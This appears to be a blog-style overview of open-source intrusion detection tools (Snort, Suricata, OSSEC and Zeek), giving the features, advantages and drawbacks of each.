There were times when system administrators only worried about virus that would infect the system but today, Security is an intense topic and people would now merely think about running an unprotected device to carry out daily activities online. Virus and worms are not the only threat but there are highly skilled hacker and malicious users who might attempt to infect our system and steal our valuable data , so modern networks need the modern network security monitoring system.
Network Intrusion Detection System is an important tools that is placed at a tactical point within the network to monitor the incoming and outgoing data packets. It analysis the information and detect suspicious activities, requests and violations of inbound and outbound rules. The NIDS not only detect the intrusion but also provides a strategy for future attack to safeguard the network and data.
Top Open Source Network Intrusion Detection System
One of the most popular open source Intrusion Detection System maintained by CISCO. It is capable of analysing real time traffic data on Windows , Unix and Linux based platform. It has three modes intrusion Detection, Packet sniffer and Packet Logger. Its’ intrusion detection mode runs on rule sets which can be downloaded from snort community or you can create your own rule sets. It use signature and anomaly based techniques to detect OS fingerprinting , port scanning and many other attacks.
Runs on Windows, Linux and Unix Active Community of users and developers. It is customizable according to your needs
No GUI(Graphical User Interface) Creating own ruleset is tough as it results in false positive alarm. Rule sets and CPU consumption are very much depended on each other.
This is one of the youngest NIDS with continuous further development . One of the best feature is it can be used with the ruleset of Snort also. It works on the application layer for better visibility and thats why it does extremely deep packet inspection with pattern matching which makes it unique and very useful in attack and threat detection.
File Identifier It has the ability to identify numerous file types while analyzing the network , and not only identify but it also allow you to if you want to look at it in future then you can extract the file in disk with meta data which contains the descriptions of the file situation and flow along with md5 checksums . Protocol Identifier As the outflow and inflow starts it automatically recognized the most common protocols . It has dedicated keywords for protocol fields which acts as a Malware command and Control channel hunter. Multi Threading One of the top features of Suricata is Multi Threading, which allows you to scale horizontally on a single appliance by adding packets processing threads. This allow the commodity hardware to achieve 10 Gigabytes of speed in real life.
System and network resource intensive Suricata utilizes lots CPU and Network resources which they openly admit in their users guide to manage the application processing load.
OSSEC is one of the most popular host based intrusion detection system (HIDS), so that it should be installed to a system which is going to monitor. It can also be used as client / server method, as the client can be deployed into multiple machines and the client sends back the data to server for analysis
.OSSEC runs on multiple platforms such as Linux, Unix and Windows. It has the ability to perform log analysis , file integrity checking . One of the unique feature is it can analysis syslog from different networking device such as routers, switches , printers etc.
Advance log analysis engine in multiple formats of database, mail server, Firewall and web server. Web Interface in graphical mode for easier to use and advance monitoring. Client and server modes to monitor multiple machines.
Upgradation to newer version of rules is difficult. Client and Server’s pre-shared encrypted communicating keys can be problematic after upgradation.
An another open source Network Intrusion Detection System if it finds any suspicious up stream and down stream it act , reacts and alert , which means it also act as an Network Intrusion Prevention System (IPS) , it also integrate with other tools. Zeek can be used as a traditional IDS to look after the specific network behaviour and keep track records of determined threats.
real time and offline analysis Profiling incoming threats encrypting behavior.
Complicated to set up Because of it’s deep packet inspection it is resource intensive.
Complicated to use.